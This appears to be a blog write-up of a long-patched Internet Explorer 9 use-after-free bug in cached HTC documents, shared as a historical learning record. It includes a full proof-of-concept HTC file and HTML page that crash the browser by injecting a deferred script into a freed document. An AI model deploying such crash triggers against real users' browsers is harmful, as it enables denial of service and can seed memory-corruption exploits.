IE9 DoS: Executing a Script in a Cached HTC Document After It Is Destroyed

This crash involved HTC (HTML Component) files and their cached document objects. By saving a reference to an HTC document, changing the behavior URL to destroy the cached document, and then injecting a script into the now-stale reference, the browser would execute code in a freed context and crash. The pattern relates to a similar bug that was patched much earlier in 2007.

<!-- htcfile.htc -->
<script language="JavaScript">
if (!window.htcDocument)
{
    window.htcDocument = document;
}
</script>

<!-- index.html -->
<script language="JavaScript">
var htcDocument = false;
function main()
{
    document.body.style.behavior = 'url(htcfile.htc?RND=1)';

    setTimeout("document.body.style.behavior = 'url(htcfile.htc?RND=2)';", 100);
    setTimeout("htcDocument.body.innerHTML = '.<script defer>x=1<\/script>';", 200);

    // If it does not crash in the first shot, we will retry.
    setTimeout("htcDocument = false; main();", 300);
}
</script>
<input type="button" size="50" onclick="main()" value="CrashMe">

The HTC file sets window.htcDocument to its own document on first load. Changing the behavior URL forces a new HTC instance to load, which destroys the original HTC document. Setting innerHTML with a deferred script on the stale reference then causes CScriptCollection::GetHolderCLSID to walk a freed object, crashing in MSHTML. The crash was rated UNKNOWN exploitability.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.